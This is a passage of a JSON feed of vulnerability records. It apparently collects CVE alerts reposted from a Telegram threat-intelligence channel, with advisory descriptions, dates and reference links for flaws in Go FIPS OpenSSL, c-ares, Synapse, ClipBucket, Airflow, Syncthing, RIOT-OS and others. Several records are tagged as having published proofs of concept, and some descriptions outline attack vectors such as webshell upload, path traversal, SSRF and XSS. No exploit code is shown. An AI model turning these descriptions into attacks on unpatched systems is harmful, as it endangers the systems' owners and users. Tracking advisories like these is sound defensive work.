"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8327", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/270", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-01-06T22:01:58.132Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/security/cve/CVE-2024-9355\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-01-06T22:38:12.000000Z"}, {"uuid": "77812d82-8b43-43c9-a3d8-69673f78572e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54XR-F67R-4PC4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-31124\n\ud83d\udd39 Description: c-ares is an asynchronous resolver library. When cross-compiling c-ares and using the autotools build system, CARES_RANDOM_FILE will not be set, as seen when cross compiling aarch64 android.  This will downgrade to using rand() as a fallback which could allow an attacker to take advantage of the lack of entropy by not using a CSPRNG. This issue was patched in version 1.19.1.\n\n\ud83d\udccf Published: 2023-05-25T21:09:31.881Z\n\ud83d\udccf Modified: 2025-01-16T18:36:25.449Z\n\ud83d\udd17 References:\n1. https://github.com/c-ares/c-ares/security/advisories/GHSA-54xr-f67r-4pc4\n2. https://github.com/c-ares/c-ares/releases/tag/cares-1_19_1\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B5Z5XFNXTNPTCBBVXFDNZQVLLIE6VRBY/\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBFWILTA33LOSV23P44FGTQQIDRJHIY7/\n5. https://security.gentoo.org/glsa/202310-09", "creation_timestamp": "2025-01-16T18:56:18.000000Z"}, {"uuid": "990e1ac6-aef8-4aba-8927-169cb0d955e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98PX-6486-J7QC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/452", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32683\n\ud83d\udd39 Description: Synapse is a Matrix protocol homeserver written in Python with the Twisted framework. A discovered oEmbed or image URL can bypass the `url_preview_url_blacklist` setting potentially allowing server side request forgery or bypassing network policies. Impact is limited to IP addresses allowed by the `url_preview_ip_range_blacklist` setting (by default this only allows public IPs) and by the limited information returned to the client: 1. For discovered oEmbed URLs, any non-JSON response or a JSON response which includes non-oEmbed information is discarded. 2. For discovered image URLs, any non-image response is discarded. Systems which have URL preview disabled (via the `url_preview_enabled` setting) or have not configured a `url_preview_url_blacklist` are not affected. This issue has been addressed in version 1.85.0. Users are advised to upgrade. User unable to upgrade may also disable URL previews.\n\ud83d\udccf Published: 2023-06-06T18:24:30.457Z\n\ud83d\udccf Modified: 2025-01-07T16:26:12.352Z\n\ud83d\udd17 References:\n1. https://github.com/matrix-org/synapse/security/advisories/GHSA-98px-6486-j7qc\n2. https://github.com/matrix-org/synapse/pull/15601\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6DH5A5YEB5LRIPP32OUW25FCGZFCZU2/", "creation_timestamp": "2025-01-07T16:37:28.000000Z"}, {"uuid": "08924e94-784b-4858-ab1c-2f5e6a835ce2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5QPX-23RW-36GG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/495", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21622\n\ud83d\udd39 Description: ClipBucket V5 provides open source video hosting with PHP. During the user avatar upload workflow, a user can choose to upload and change their avatar at any time. During deletion, ClipBucket checks for the avatar_url as a filepath within the avatars subdirectory. If the URL path exists within the avatars directory, ClipBucket will delete it. There is no check for path traversal sequences in the provided user input (stored in the DB as avatar_url) therefore the final $file variable could be tainted with path traversal sequences. This leads to file deletion outside of the intended scope of the avatars folder. This vulnerability is fixed in 5.5.1 - 237.\n\ud83d\udccf Published: 2025-01-07T15:33:40.680Z\n\ud83d\udccf Modified: 2025-01-07T17:10:50.287Z\n\ud83d\udd17 References:\n1. https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-5qpx-23rw-36gg\n2. https://github.com/MacWarrior/clipbucket-v5/commit/22329c4675e82c7c95e74024ba247f837ac9e00b", "creation_timestamp": "2025-01-07T17:41:49.000000Z"}, {"uuid": "147a0533-a8d8-4243-ad41-e8a1e5b3d6ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PM87-24WQ-R8W9", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/679", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45033\n\ud83d\udd39 Description: Insufficient Session Expiration vulnerability in Apache Airflow Fab Provider.\n\nThis issue affects Apache Airflow Fab Provider: before 1.5.2.\n\nWhen user password has been changed with admin CLI, the sessions for that user have not been cleared, leading to insufficient session expiration, thus logged users could continue to be logged in even after the password was changed. This only happened when the password was changed with CLI. The problem does not happen in case change was done with webserver thus this is different from\u00a0 CVE-2023-40273 https://github.com/advisories/GHSA-pm87-24wq-r8w9 \u00a0which was addressed in Apache-Airflow 2.7.0\n\n\nUsers are recommended to upgrade to version 1.5.2, which fixes the issue.\n\ud83d\udccf Published: 2025-01-08T08:41:39.579Z\n\ud83d\udccf Modified: 2025-01-08T08:41:39.579Z\n\ud83d\udd17 References:\n1. https://github.com/apache/airflow/pull/45139\n2. https://lists.apache.org/thread/yw535346rk766ybzpqtvrl36sjj789st", "creation_timestamp": "2025-01-08T09:12:24.000000Z"}, {"uuid": "ca208d6b-165c-4f1b-98a0-2ddf5c7e6ba5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R5VF-WF4H-82GG", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/494", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52813\n\ud83d\udd39 Description: matrix-rust-sdk is an implementation of a Matrix client-server library in Rust. Versions of the matrix-sdk-crypto Rust crate before 0.8.0 lack a dedicated mechanism to notify that a user's cryptographic identity has changed from a verified to an unverified one, which could cause client applications relying on the SDK to overlook such changes. matrix-sdk-crypto 0.8.0 adds a new VerificationLevel::VerificationViolation enum variant which indicates that a previously verified identity has been changed.\n\ud83d\udccf Published: 2025-01-07T15:25:47.794Z\n\ud83d\udccf Modified: 2025-01-07T17:11:35.476Z\n\ud83d\udd17 References:\n1. https://github.com/matrix-org/matrix-rust-sdk/security/advisories/GHSA-r5vf-wf4h-82gg\n2. https://github.com/matrix-org/matrix-rust-sdk/pull/3795", "creation_timestamp": "2025-01-07T17:41:35.000000Z"}, {"uuid": "c056d518-b7f2-4805-b6a9-60e6da604260", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98VM-2XQM-XRCC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/498", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21624\n\ud83d\udd39 Description: ClipBucket V5 provides open source video hosting with PHP. Prior to 5.5.1 - 239, a file upload vulnerability exists in the Manage Playlist functionality of the application, specifically surrounding the uploading of playlist cover images. Without proper checks, an attacker can upload a PHP script file instead of an image file, thus allowing a webshell or other malicious files to be stored and executed on the server. This attack vector exists in both the admin area and low-level user area. This vulnerability is fixed in 5.5.1 - 239.\n\ud83d\udccf Published: 2025-01-07T15:46:11.169Z\n\ud83d\udccf Modified: 2025-01-07T17:02:34.217Z\n\ud83d\udd17 References:\n1. https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-98vm-2xqm-xrcc\n2. https://github.com/MacWarrior/clipbucket-v5/commit/893bfb0f1236c4a59b5e2843ab8d27a1e491b12b", "creation_timestamp": "2025-01-07T17:42:33.000000Z"}, {"uuid": "c4e2b75c-60f5-4c5e-9715-cb236f0c50b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-55WQ-2HGM-75M4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/503", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-40427\n\ud83d\udd39 Description: Stack Buffer Overflow in PX4-Autopilot v1.14.3, which allows attackers to execute commands to exploit this vulnerability and cause the program to refuse to execute\n\ud83d\udccf Published: 2025-01-07T00:00:00\n\ud83d\udccf Modified: 2025-01-07T18:33:07.431948\n\ud83d\udd17 References:\n1. https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-55wq-2hgm-75m4\n2. https://github.com/PX4/PX4-Autopilot/commit/e03e0261a1a0c82f545e66a1e3795956c886db71", "creation_timestamp": "2025-01-07T18:37:19.000000Z"}, {"uuid": "c3ae161a-bde5-4137-a815-a47efd9578b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2FQM-M4R2-FH98", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/505", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33977\n\ud83d\udd39 Description: Kiwi TCMS is an open source test management system for both manual and automated testing. Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced upload validators in order to prevent potentially dangerous files from being uploaded and Content-Security-Policy definition to prevent cross-site-scripting attacks. The upload validation checks were not 100% robust which left the possibility to circumvent them and upload a potentially dangerous file which allows execution of arbitrary JavaScript in the browser. Additionally we've discovered that Nginx's `proxy_pass` directive will strip some headers negating protections built into Kiwi TCMS when served behind a reverse proxy. This issue has been addressed in version 12.4. Users are advised to upgrade. Users unable to upgrade who are serving Kiwi TCMS behind a reverse proxy should make sure that additional header values are still passed to the client browser. If they aren't redefining them inside the proxy configuration.\n\ud83d\udccf Published: 2023-06-06T18:03:18.882Z\n\ud83d\udccf Modified: 2025-01-07T18:30:30.909Z\n\ud83d\udd17 References:\n1. https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-2fqm-m4r2-fh98\n2. https://github.com/kiwitcms/Kiwi/commit/d789f4b51025de4f8c747c037d02e1b0da80b034\n3. https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L66-L68\n4. https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L87\n5. https://huntr.dev/bounties/6aea9a26-e29a-467b-aa5a-f767f0c2ec96/", "creation_timestamp": "2025-01-07T18:37:38.000000Z"}, {"uuid": "736faf74-3715-4188-ba84-089af6c1832a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9RP6-23GF-4C3H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/504", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46165\n\ud83d\udd39 Description: Syncthing is an open source, continuous file synchronization program. In versions prior to 1.23.5 a compromised instance with shared folders could sync malicious files which contain arbitrary HTML and JavaScript in the name. If the owner of another device looks over the shared folder settings and moves the mouse over the latest sync, a script could be executed to change settings for shared folders or add devices automatically. Additionally adding a new device with a malicious name could embed HTML or JavaScript inside parts of the page. As a result the webUI may be subject to a stored cross site scripting attack. This issue has been addressed in version 1.23.5. Users are advised to upgrade. Users unable to upgrade should avoid sharing folders with untrusted users.\n\ud83d\udccf Published: 2023-06-06T17:59:30.857Z\n\ud83d\udccf Modified: 2025-01-07T18:32:23.914Z\n\ud83d\udd17 References:\n1. https://github.com/syncthing/syncthing/security/advisories/GHSA-9rp6-23gf-4c3h\n2. https://github.com/syncthing/syncthing/commit/73c52eafb6566435dffd979c3c49562b6d5a4238\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IRYGBFJPVBW6PPTETNIBWQJE4HJSA5PJ/\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XEBWSQVGHSTR4ZO7LVVEMPEGMV2DS5XR/", "creation_timestamp": "2025-01-07T18:37:29.000000Z"}, {"uuid": "7354453c-e55b-44ff-a2b4-a8f33cfaed8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQM8-XJ74-FJW2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1164", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-24825\n\ud83d\udd39 Description: RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2023.04, an attacker can send a crafted frame to the device to trigger a NULL pointer dereference leading to denial of service. This issue is fixed in version 2023.04. There are no known workarounds.\n\ud83d\udccf Published: 2023-05-30T15:54:49.930Z\n\ud83d\udccf Modified: 2025-01-10T16:55:33.480Z\n\ud83d\udd17 References:\n1. https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-xqm8-xj74-fjw2\n2. https://github.com/RIOT-OS/RIOT/commit/0c522075445a62ce3102e141573ecc2788521897\n3. https://github.com/RIOT-OS/RIOT/blob/2022.10-branch/sys/net/gnrc/network_layer/sixlowpan/frag/rb/gnrc_sixlowpan_frag_rb.c#L416\n4. https://github.com/RIOT-OS/RIOT/blob/2022.10-branch/sys/net/gnrc/network_layer/sixlowpan/frag/rb/gnrc_sixlowpan_frag_rb.c#L429\n5. https://github.com/RIOT-OS/RIOT/blob/2022.10-branch/sys/net/gnrc/network_layer/sixlowpan/iphc/gnrc_sixlowpan_iphc.c#L729\n6. https://github.com/RIOT-OS/RIOT/blob/2022.10-branch/sys/net/gnrc/network_layer/sixlowpan/iphc/gnrc_sixlowpan_iphc.c#L761\n7. https://github.com/RIOT-OS/RIOT/blob/ccbb304eae7b59e8aca24a6ffd095b5b3f7720ee/sys/net/gnrc/pktbuf_static/gnrc_pktbuf_static.c#L169", "creation_timestamp": "2025-01-10T17:03:29.000000Z"}, {"uuid": "c64917d4-cd92-4c70-b765-40173756c837", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJGW-7638-29G5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1163", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-24817\n\ud83d\udd39 Description: RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2023.04, an attacker can send a crafted frame to the device resulting in an integer underflow and out of bounds access in the packet buffer. Triggering the access at the right time will corrupt other packets or the allocator metadata. Corrupting a pointer will lead to denial of service. This issue is fixed in version 2023.04. As a workaround, disable SRH in the network stack.\n\ud83d\udccf Published: 2023-05-30T15:50:54.247Z\n\ud83d\udccf Modified: 2025-01-10T16:55:55.774Z\n\ud83d\udd17 References:\n1. https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-xjgw-7638-29g5\n2. https://github.com/RIOT-OS/RIOT/commit/34dc1757f5621be48e226cfebb2f4c63505b5360", "creation_timestamp": "2025-01-10T17:03:26.000000Z"}, {"uuid": "d5b42d52-02e0-427a-aaf9-41bc24790309", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1468", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "95888dd5-5eb6-44d8-b4df-7c44d6682df5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1763", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "b347e410-c2ff-4e86-a218-a8e4468d7c55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2569", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "c23c62b4-e53e-4b22-8047-5e3aeec9c94a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1502", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. 